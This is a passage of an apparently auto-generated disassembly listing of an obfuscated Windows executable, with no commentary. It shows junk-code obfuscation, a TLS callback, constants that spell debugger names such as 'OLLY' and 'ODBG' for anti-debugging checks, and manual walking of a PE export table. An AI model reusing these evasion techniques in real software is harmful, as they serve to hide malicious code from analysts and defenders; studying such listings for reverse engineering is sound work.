loc_42930D: ; CODE XREF: sub_429CAE+C�j
jmp loc_422678
; END OF FUNCTION CHUNK FOR sub_429CAE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_429312: ; CODE XREF: sub_422EB0+1F6D�j
adc ebp, 46CB6968h
shl eax, 6
and ecx, esi
and ebx, edx
jmp loc_421E79
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422CA6
loc_429324: ; CODE XREF: sub_422CA6+2D2A�j
cdq
jns loc_428E64
jmp loc_42AD44
; END OF FUNCTION CHUNK FOR sub_422CA6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42678A
loc_429330: ; CODE XREF: sub_42678A-2E8F�j
jz loc_42933E
mov ebx, [ebx+ecx]
; END OF FUNCTION CHUNK FOR sub_42678A
; START OF FUNCTION CHUNK FOR sub_4281A5
loc_429339: ; CODE XREF: sub_4281A5:loc_428FF1�j
call sub_423B78
loc_42933E: ; CODE XREF: sub_42678A:loc_4238E4�j
; sub_42678A+A�j ...
jz loc_42257A
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jmp loc_428B87
; END OF FUNCTION CHUNK FOR sub_4281A5
; =============== S U B R O U T I N E =======================================
sub_429352 proc near ; CODE XREF: _94j21ax3:0042B258�p
mov [esp+0], eax
retn
sub_429352 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_429356: ; CODE XREF: sub_4221B8+9797�j
jmp loc_429017
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
loc_42935B: ; CODE XREF: _94j21ax3:00428A3A�j
jmp loc_428588
; ---------------------------------------------------------------------------
loc_429360: ; CODE XREF: _94j21ax3:00427585�j
jmp loc_42496F
; ---------------------------------------------------------------------------
loc_429365: ; CODE XREF: _94j21ax3:0042747F�j
jmp loc_42C36D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422AD5
loc_42936A: ; CODE XREF: sub_422AD5+39F8�j
jmp nullsub_210
; END OF FUNCTION CHUNK FOR sub_422AD5
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42936F proc near ; CODE XREF: sub_42B9E8-91B9�p
push ebp
mov ebp, esp
call sub_42AB30
locret_429377: ; CODE XREF: sub_423B04:loc_428113�j
retn
sub_42936F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_429378: ; CODE XREF: sub_4294B3+2302�j
jmp loc_42920A
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_42937D: ; CODE XREF: sub_42C057-AE4C�j
jmp nullsub_130
; END OF FUNCTION CHUNK FOR sub_42C057
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429382 proc near ; CODE XREF: sub_42BAC2+1�p
; FUNCTION CHUNK AT 00423D9D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00424742 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A5CD SIZE 00000024 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_42C4B8
jmp loc_424742
sub_429382 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_429394: ; CODE XREF: _94j21ax3:loc_42A558�j
push ecx
push 0C15CA2D2h
pop ecx
xor ecx, 0F490FAAEh
push offset loc_4216BC
jmp loc_42392F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BF31
loc_4293AB: ; CODE XREF: sub_42BF31:loc_42BF11�j
pop ebx
sub ebx, ds:4000FBh
add ebx, 0A2F3E0FBh
xchg ebx, [esp+0]
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_42BF31
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_62. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_4293C1: ; CODE XREF: sub_423324+868C�j
jns loc_428DB6
ror ebx, 0Dh
adc eax, 0B03313D2h
loc_4293D0: ; CODE XREF: sub_423324:loc_42B9A8�j
xor eax, 0DAFD8DC0h
jmp loc_42BAA2
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
loc_4293DB: ; CODE XREF: _94j21ax3:0042B7CD�j
call sub_421C65
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_4293E0: ; CODE XREF: sub_42A0CC+2517�j
jmp loc_42775F
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_4293E5: ; CODE XREF: sub_421402:loc_42885D�j
jl loc_42A8FD
; END OF FUNCTION CHUNK FOR sub_421402
; START OF FUNCTION CHUNK FOR sub_426BA2
loc_4293EB: ; CODE XREF: sub_426BA2+6�j
jmp nullsub_68
; END OF FUNCTION CHUNK FOR sub_426BA2
; ---------------------------------------------------------------------------
jg locret_421C6A
jmp loc_42A8F9
; ---------------------------------------------------------------------------
loc_4293FB: ; CODE XREF: _94j21ax3:0042BE2D�j
and edx, 0FD894C47h
add edx, 0F6845D3Ah
call sub_4239A5
call sub_42574E
push 0EC0207D6h
pop edx
or edx, 0C884FDEDh
jmp loc_422F24
; ---------------------------------------------------------------------------
add ecx, edx
jmp loc_428692
; ---------------------------------------------------------------------------
loc_429429: ; DATA XREF: sub_42A5B9+A�o
jnz loc_428AFE
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_425BD4[eax*4]
jmp loc_4273E1
; ---------------------------------------------------------------------------
loc_429441: ; CODE XREF: _94j21ax3:0042C137�j
xor edi, 75CE4EEh
; =============== S U B R O U T I N E =======================================
sub_429447 proc near ; CODE XREF: sub_424EE4+57BA�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004224DA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00424293 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004274B6 SIZE 00000004 BYTES
mov [esp-4+arg_0], edi
pop edi
not ebx
mov ebx, edx
sbb edx, 11D8576h
call sub_429A13
loc_42945A: ; CODE XREF: sub_42AFFE+C�j
jmp loc_4224DA
sub_429447 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42945F: ; CODE XREF: sub_42B9CF+5B6�j
jl loc_4272E1
not edx
loc_429467: ; CODE XREF: sub_42B9CF:loc_42A0DF�j
call nullsub_146
retn
; END OF FUNCTION CHUNK FOR sub_42B9CF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_146. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_42946E: ; CODE XREF: sub_42A7A6+1F�j
jmp loc_42A6AD
; END OF FUNCTION CHUNK FOR sub_42A7A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_429473: ; CODE XREF: sub_42284F+7CC7�j
jmp loc_426485
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE5A
loc_429478: ; CODE XREF: sub_42AE5A-5AE7�j
jmp loc_426968
; END OF FUNCTION CHUNK FOR sub_42AE5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42947D: ; CODE XREF: sub_42B9CF-9AF0�j
jmp loc_42B7D2
; ---------------------------------------------------------------------------
loc_429482: ; CODE XREF: sub_42B9CF+2�j
call sub_426B3C
loc_429487: ; CODE XREF: _94j21ax3:loc_42A8C7�j
jmp loc_42B2A9
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
or ebx, ebp
jmp sub_427AEB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_429493: ; CODE XREF: sub_42169F+75A5�j
push 0F2BE87FEh
pop edx
or edx, 788A3468h
loc_42949F: ; CODE XREF: sub_42C5E8:loc_42C08D�j
xor edx, 0A24A245h
add edx, 0FA86B2Fh
xchg edx, [esp-10h+arg_C]
jmp nullsub_69
; END OF FUNCTION CHUNK FOR sub_42169F
; =============== S U B R O U T I N E =======================================
sub_4294B3 proc near ; CODE XREF: sub_421F28:loc_421100�p
; _94j21ax3:0042A897�j
var_C = dword ptr -0Ch
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 004218BE SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004218DE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00421FC4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422133 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042214D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00422517 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00422823 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422A86 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00422BB4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042302D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042388D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004238AC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00423941 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00423B2B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004241B1 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00424263 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00424382 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00424433 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424A18 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00424E69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424F8E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00425077 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042529E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425429 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004256AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004256C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042583C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042682A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004268DC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00426D06 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426DC0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042750E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042790B SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042847A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042850E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004287FF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428881 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042920A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429378 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429565 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042958A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004296B1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004297FA SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004299A5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042A94C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042A9FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B7A9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042BEB4 SIZE 00000022 BYTES
mov [esp-0Ch+arg_8], esi
pop esi
and eax, 7
mov [ebp-4], eax
loc_4294BD: ; CODE XREF: sub_427EBE+7�j
; sub_427CAC:loc_42A533�j ...
jz loc_429565
cmp dword ptr [ebp-4], 0
jnz loc_42BEC6
jmp loc_4256C4
sub_4294B3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
add edi, eax
jmp sub_424DE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42773C
loc_4294D9: ; CODE XREF: sub_42773C+1E�j
push offset loc_42A39C
jmp nullsub_70
; END OF FUNCTION CHUNK FOR sub_42773C
; =============== S U B R O U T I N E =======================================
sub_4294E3 proc near ; DATA XREF: sub_4289CF+2137�o
; FUNCTION CHUNK AT 0042C234 SIZE 00000005 BYTES
push eax
push 54C92424h
pop eax
add eax, 0AB790DF3h
push offset sub_42A1E5
jmp loc_42C234
sub_4294E3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B238
loc_4294FA: ; CODE XREF: sub_42B238:loc_42AA5A�j
test ecx, 57E1884Ch
jmp loc_428390
; END OF FUNCTION CHUNK FOR sub_42B238
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425934
loc_429505: ; CODE XREF: sub_425934+45BF�j
jno loc_42BA45
mov eax, 83E34EFDh
jmp loc_42643C
; END OF FUNCTION CHUNK FOR sub_425934
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422866
loc_429515: ; CODE XREF: sub_422866+764B�j
mov [ecx], eax
xchg eax, [esp+0]
mov ecx, eax
pop eax
push 400h
push 0C5B57DA9h
pop eax
or eax, 0A6FB65B9h
jmp loc_423002
; END OF FUNCTION CHUNK FOR sub_422866
; ---------------------------------------------------------------------------
sbb esi, edi
add edi, 3E3B09D1h
jmp sub_42266A
; ---------------------------------------------------------------------------
test edi, esi
jmp loc_4299FE
; ---------------------------------------------------------------------------
or ebx, esi
; START OF FUNCTION CHUNK FOR sub_422C48
loc_429549: ; CODE XREF: sub_422C48+1950�j
mov ebx, edi
jmp sub_422401
; END OF FUNCTION CHUNK FOR sub_422C48
; =============== S U B R O U T I N E =======================================
sub_429550 proc near ; CODE XREF: _94j21ax3:00421B85�j
; sub_42ADA2+5�p
mov [esp+0], ebx
pop ebx
cmp dword ptr [ebp-14h], 6
setz al
loc_42955B: ; CODE XREF: sub_42484C:loc_42AA26�j
push offset sub_428EDA
jmp nullsub_72
sub_429550 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_429565: ; CODE XREF: sub_4294B3:loc_4294BD�j
cmp dword ptr [ebp-4], 0
jnz loc_42BEC6
jmp loc_4256AC
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423081
loc_429574: ; CODE XREF: sub_423081+9591�j
push 4C34749Ch
pop edx
sub edx, 0DFC7BAE4h
call sub_4214E6
; END OF FUNCTION CHUNK FOR sub_423081
; START OF FUNCTION CHUNK FOR sub_42266A
loc_429585: ; CODE XREF: sub_42266A+3EAB�j
; _94j21ax3:0042C1D0�j
jmp sub_424E34
; END OF FUNCTION CHUNK FOR sub_42266A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42958A: ; CODE XREF: sub_4294B3-7BE5�j
jmp loc_42B7A9
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
xchg eax, ebp
jmp sub_42BF31
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_429596: ; CODE XREF: sub_423324+2790�j
or ebx, 0C9DBFD93h
add ebx, 36469FE9h
mov [ebx], eax
pop ebx
locret_4295A5: ; CODE XREF: _94j21ax3:0042C3B8�j
retn
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
loc_4295A6: ; CODE XREF: _94j21ax3:0042B678�j
jmp loc_42A984
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_4295AB: ; CODE XREF: sub_42A0CC-660A�j
jmp nullsub_123
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424DE8
loc_4295B0: ; CODE XREF: _94j21ax3:00423BE2�j
; sub_424DE8+27CD�j
push offset sub_4211F4
jmp nullsub_73
; END OF FUNCTION CHUNK FOR sub_424DE8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4295BA proc near ; CODE XREF: sub_422F50+76BE�j
retn
sub_4295BA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421457
loc_4295BB: ; CODE XREF: sub_421457+6709�j
jmp nullsub_74
; END OF FUNCTION CHUNK FOR sub_421457
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B358
loc_4295C0: ; CODE XREF: sub_42B358-93C0�j
jmp loc_4217B2
; END OF FUNCTION CHUNK FOR sub_42B358
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42848B
loc_4295C5: ; CODE XREF: sub_42848B+8�j
push 0D555232Ch
loc_4295CA: ; CODE XREF: _94j21ax3:loc_42894E�j
pop eax
and eax, 0B6A2FBE9h
add eax, 6C421D50h
mov eax, [eax]
jmp loc_421288
; END OF FUNCTION CHUNK FOR sub_42848B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424CF2
loc_4295DE: ; CODE XREF: sub_424CF2:loc_42C4AC�j
mov ebx, esi
pop esi
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_424CF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422436
loc_4295E3: ; CODE XREF: sub_422436+9F63�j
jmp loc_42B458
; END OF FUNCTION CHUNK FOR sub_422436
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_4295E8: ; CODE XREF: sub_422EB0-15D7�j
jmp loc_4213F7
; END OF FUNCTION CHUNK FOR sub_422EB0
; =============== S U B R O U T I N E =======================================
sub_4295ED proc near ; DATA XREF: sub_42B4F1-966�o
mov eax, [ebp-18h]
add eax, eax
jmp loc_42BD96
sub_4295ED endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423C51
loc_4295F7: ; CODE XREF: sub_423C51�j
adc edx, [esp+arg_0]
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_421EAD
jmp loc_422D81
; END OF FUNCTION CHUNK FOR sub_423C51
; =============== S U B R O U T I N E =======================================
sub_42960D proc near ; DATA XREF: sub_425301:loc_42BEA2�o
; FUNCTION CHUNK AT 0042A37A SIZE 00000005 BYTES
push 65C29EDh
pop eax
add eax, 0E933F465h
sub eax, 2B85359h
push offset loc_426763
jmp loc_42A37A
sub_42960D endp
; =============== S U B R O U T I N E =======================================
sub_429629 proc near ; CODE XREF: sub_42A0CC:loc_42356D�p
; _94j21ax3:0042BA05�j
; FUNCTION CHUNK AT 0042381B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00424949 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426AE0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004278E6 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00428562 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428B24 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429098 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042BA3A SIZE 0000000B BYTES
xchg esi, [esp+0]
pop esi
push 1
lea eax, [ebp-800h]
push esi
call sub_428694
loc_42963B: ; CODE XREF: sub_42ADA2-4156�j
jmp loc_429098
sub_429629 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_429640: ; CODE XREF: sub_423324-204D�j
jmp loc_423DDB
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421013
loc_429645: ; CODE XREF: sub_421013+13�j
jmp loc_4216DE
; END OF FUNCTION CHUNK FOR sub_421013
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42134B
loc_42964A: ; CODE XREF: sub_42134B+3�j
lea eax, [ebp-20h]
mov dword ptr [eax], 594C4C4Fh
lea eax, [ebp-1Ch]
mov dword ptr [eax], 474244h
push 0
jmp loc_428081
; END OF FUNCTION CHUNK FOR sub_42134B
; ---------------------------------------------------------------------------
xchg edx, ebp
jmp sub_421644
; =============== S U B R O U T I N E =======================================
sub_42966A proc near ; CODE XREF: _94j21ax3:00428FA7�j
; sub_429382:loc_42A5CD�p
; FUNCTION CHUNK AT 0042512E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426AD7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042C490 SIZE 00000005 BYTES
mov [esp+0], esi
pop esi
or eax, eax
jnz loc_426AD7
jmp loc_42512E
sub_42966A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
or ebp, ecx
jmp sub_42AEB2
; ---------------------------------------------------------------------------
xor ebp, ecx
jmp sub_424791
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR TlsCallback_0
loc_429689: ; CODE XREF: TlsCallback_0+1B�j
jnz loc_423047
jmp loc_424FCC
; END OF FUNCTION CHUNK FOR TlsCallback_0
; ---------------------------------------------------------------------------
sbb eax, 6CA10A88h
jmp sub_42A277
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_42969F: ; CODE XREF: sub_4272E9+200A�j
jz nullsub_155
jmp loc_4255D1
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42651A
loc_4296AA: ; CODE XREF: sub_42651A:loc_42B642�j
xchg ebx, ebp
call sub_424EFA
; END OF FUNCTION CHUNK FOR sub_42651A
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_4296B1: ; CODE XREF: sub_4294B3:loc_4256C4�j
jz loc_4212C5
jmp loc_423349
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
loc_4296BC: ; CODE XREF: _94j21ax3:00428273�j
jnz loc_42B3CA
; =============== S U B R O U T I N E =======================================
sub_4296C2 proc near ; CODE XREF: sub_4249A9+1�p
xchg eax, [esp+0]
pop eax
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
call sub_425934
loc_4296D1: ; CODE XREF: sub_4291BC-764B�j
jmp nullsub_75
sub_4296C2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pushf
jmp sub_429A13
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4296DC: ; CODE XREF: sub_42284F+2D34�j
or ecx, 9E80D791h
loc_4296E2: ; CODE XREF: sub_42284F:loc_422EC0�j
; sub_424C37:loc_423CDD�j ...
jns loc_42122C
cmp dword ptr [ebp-4], 6
jnz loc_427EEB
jmp loc_42236A
; END OF FUNCTION CHUNK FOR sub_42284F
; =============== S U B R O U T I N E =======================================
sub_4296F7 proc near ; DATA XREF: sub_427004:loc_427D42�o
add ecx, 1C2E3380h
xchg ecx, [esp+0]
jmp sub_428AE1
sub_4296F7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426FE1
loc_429705: ; CODE XREF: sub_426FE1:loc_4224B5�j
mov ecx, [ebp-1Ch]
and ecx, 7
mov al, 1
shl al, cl
jmp loc_425B9B
; END OF FUNCTION CHUNK FOR sub_426FE1
; ---------------------------------------------------------------------------
xchg ecx, ebx
push ebx
xchg ecx, ebx
mov ecx, [esp+10h]
jmp loc_4228E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAD4
loc_429722: ; CODE XREF: sub_42BAD4:loc_42BAE2�j
test eax, esi
jmp loc_425B27
; END OF FUNCTION CHUNK FOR sub_42BAD4
; ---------------------------------------------------------------------------
loc_429729: ; CODE XREF: _94j21ax3:0042180D�j
jnp loc_42BA40
; =============== S U B R O U T I N E =======================================
sub_42972F proc near ; CODE XREF: sub_426FE1+33E3�p
var_14 = dword ptr -14h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042204E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423536 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00423934 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424AD7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042660D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426C07 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00428677 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042987B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042990A SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0042B119 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B4AF SIZE 00000007 BYTES
mov [esp+0], eax
pop eax
xor eax, 0EED44C99h
and ecx, eax
pop eax
mov al, 1
jmp loc_424AD7
sub_42972F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_429743: ; CODE XREF: _94j21ax3:loc_4280F6�j
mov [esp], eax
ror eax, 3
mov ds:dword_424068, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B314
loc_429750: ; CODE XREF: sub_42B314+240�j
js loc_424EA8
sbb esi, 0EA64E167h
and eax, 5FA8490h
loc_429762: ; CODE XREF: sub_4272E9:loc_4255D1�j
call nullsub_3
retn
; END OF FUNCTION CHUNK FOR sub_42B314
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422CC1
loc_429768: ; CODE XREF: sub_422CC1+D�j
jmp nullsub_76
; END OF FUNCTION CHUNK FOR sub_422CC1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_42976D: ; CODE XREF: sub_4272E9:loc_4292E6�j
call sub_42C057
test al, al
jmp loc_424731
; END OF FUNCTION CHUNK FOR sub_4272E9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_215. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42430C
loc_42977A: ; CODE XREF: sub_42430C:loc_428FF6�j
call sub_4239A5
push eax
loc_429780: ; CODE XREF: sub_424EE4:loc_42A6A3�j
ror eax, 4
call sub_42A5A2
loc_429788: ; CODE XREF: sub_423A56+4BB0�j
jmp loc_423E68
; END OF FUNCTION CHUNK FOR sub_42430C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42982D
loc_42978D: ; CODE XREF: sub_42982D-71FF�j
jmp loc_42BCB0
; END OF FUNCTION CHUNK FOR sub_42982D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421558
loc_429792: ; CODE XREF: sub_421558:loc_428FAE�j
and edi, 0FE89E895h
add edi, 3B87DD1h
push offset loc_424882
jmp loc_42AA50
; END OF FUNCTION CHUNK FOR sub_421558
; ---------------------------------------------------------------------------
loc_4297A8: ; CODE XREF: _94j21ax3:loc_4266F1�j
pop edx
add edx, 0D4090D85h
push offset sub_4286DC
jmp loc_426542
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_205. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_4297BA: ; CODE XREF: sub_4272E9-17A3�j
jmp loc_4279B1
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4F4
loc_4297BF: ; CODE XREF: sub_42A4F4:loc_426E8F�j
push eax
push 400000h
mov eax, [ebp-10h]
; END OF FUNCTION CHUNK FOR sub_42A4F4
; START OF FUNCTION CHUNK FOR sub_4249A9
loc_4297C8: ; CODE XREF: sub_4249A9:loc_4249AF�j
push eax
jmp loc_424D4E
; END OF FUNCTION CHUNK FOR sub_4249A9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_4297CE: ; CODE XREF: sub_423F55-3BA�j
ja loc_4272C9
; END OF FUNCTION CHUNK FOR sub_423F55
; START OF FUNCTION CHUNK FOR sub_423324
loc_4297D4: ; CODE XREF: sub_423324:loc_42398D�j
or edi, 76695601h
add edi, 0E1D2DCCEh
loc_4297E0: ; CODE XREF: sub_428BBD-55CD�j
call sub_429DE9
loc_4297E5: ; CODE XREF: sub_426C7A-2B4D�j
push edx
push eax
mov eax, [ebp-8]
cdq
loc_4297EB: ; CODE XREF: _94j21ax3:0042410E�j
add eax, [esp+0]
adc edx, [esp+3Ch+var_38]
add esp, 8
jmp loc_42B07E
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_4297FA: ; CODE XREF: sub_4294B3-5982�j
jnp loc_4238AC
loc_429800: ; CODE XREF: sub_4294B3:loc_422517�j
lea eax, [ebp-2BBh]
cmp dword ptr [eax], 4742444Fh
jz loc_42A566
jmp loc_426D06
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B0C9
loc_429817: ; CODE XREF: sub_42B0C9:loc_422B90�j
pop ebx
xor ebx, 80B9BAAEh
xor edx, ebx
pop ebx
jmp loc_4287AA
; END OF FUNCTION CHUNK FOR sub_42B0C9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_127. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push eax
call sub_42B71E
; =============== S U B R O U T I N E =======================================
sub_42982D proc near ; CODE XREF: sub_422EB0+1B9D�p
; _94j21ax3:0042642C�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00421C25 SIZE 00000008 BYTES
